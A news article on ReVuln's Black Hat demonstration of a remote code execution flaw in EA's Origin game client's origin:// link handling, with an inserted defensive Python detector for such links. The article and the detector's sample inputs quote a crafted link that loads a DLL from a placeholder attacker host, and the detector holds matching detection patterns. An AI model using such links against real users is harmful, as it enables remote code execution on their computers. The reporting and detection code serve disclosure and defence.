More than 40 million people could be affected by a vulnerability researchers uncovered in EA’s Origin online game platform allowing attackers to remotely execute malicious code on players’ computers.
The attack, demonstrated on Friday at the Black Hat security conference in Amsterdam, takes just seconds to execute. In some cases, it requires no interaction by victims, researchers from Malta-based ReVuln (@revuln) told Ars Technica. It manipulates the uniform resource identifiers EA’s site uses to automatically start games on PCs.
“The Origin platform allows malicious users to exploit local vulnerabilities or features by abusing the Origin URI handling mechanism,” ReVuln researchers Donato Ferrante and Luigi Auriemma wrote in a paper accompanying last week’s demonstration.
“In other words, an attacker can craft a malicious Internet link to execute malicious code remotely on [a] victim’s system, which has Origin installed.”
The researchers’ demo shows them taking control of a computer that has the Origin client and Crysis 3 game installed. Behind the scenes, the EA platform uses the origin://LaunchGame/71503 link to activate the game.
When a targeted user instead clicks on a URI such as origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll, the Origin client will load a Windows dynamic link library file of the attackers’ choosing on the victim’s computer.
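A defensive sketch of how links of this shape can be flagged in proxy logs or mail bodies. It is added here as an example and is not taken from ReVuln's paper or EA's code. The rule names and sample links are constructed, and ATTACKER_IP is the article's own placeholder.

```python
import re
from urllib.parse import unquote

# Rule names are illustrative, not from any product.
RULES = [
    ("openautomate-switch", re.compile(r"(?i)-openautomate\b")),
    # \\host\share or //host/share: a path that resolves to a remote machine
    ("unc-path", re.compile(r"(?:\\\\|//)[^\\/\s]+[\\/]\S+")),
    ("dll-reference", re.compile(r"(?i)\.dll\b")),
]

def command_params(uri):
    """Return the decoded CommandParams value of an origin:// link.

    None means "not an origin:// link"; "" means no CommandParams given.
    """
    scheme, sep, rest = uri.strip().partition("://")
    if not sep or scheme.lower() != "origin":
        return None
    query = rest.partition("?")[2]
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        # Key is matched case-insensitively to stay conservative (assumption).
        if unquote(key).lower() == "commandparams":
            return unquote(value)  # links may arrive percent-encoded
    return ""

def inspect_uri(uri):
    """List the reasons a link deserves attention (empty list = nothing found)."""
    params = command_params(uri)
    if not params or not params.strip():
        return []
    findings = ["extra-command-params"]
    findings += [name for name, rx in RULES if rx.search(params)]
    return findings

# Constructed samples; ATTACKER_IP is the article's own placeholder.
SAMPLES = [
    "origin://LaunchGame/71503",
    r"origin://LaunchGame/71503?CommandParams= -openautomate \\ATTACKER_IP\evil.dll",
    "ORIGIN://LaunchGame/71503?commandparams=%20-openautomate%20%5C%5CATTACKER_IP%5Cevil.dll",
    "origin://LaunchGame/71503?CommandParams=-example-flag",
    "https://example.com/?CommandParams=x",
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(inspect_uri(s) or "clean", "<-", s)
```

A plain launch link returns no findings, while any link that carries CommandParams is reported, with extra findings when the value points at a remote path or a DLL.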
EA Games on the problem:
“Our team is constantly investigating hypotheticals like this one as we continually update our security infrastructure,” an EA spokesman wrote in an e-mail to Ars Technica.
The attack is similar to an exploit the same researchers demonstrated in October on Steam.
The Origin attack works much the same. When an origin:// link is opened for the first time, browsers will typically ask if a user wants it to open in the Origin client, which is the registered application for such URLs.
Browsers handle these links differently, with some displaying full paths, others showing only parts of them, and still others not displaying the URL at all. Some confirmation prompts give users the option of using the Origin client to open all origin:// links encountered in the future.
Source: Ars Technica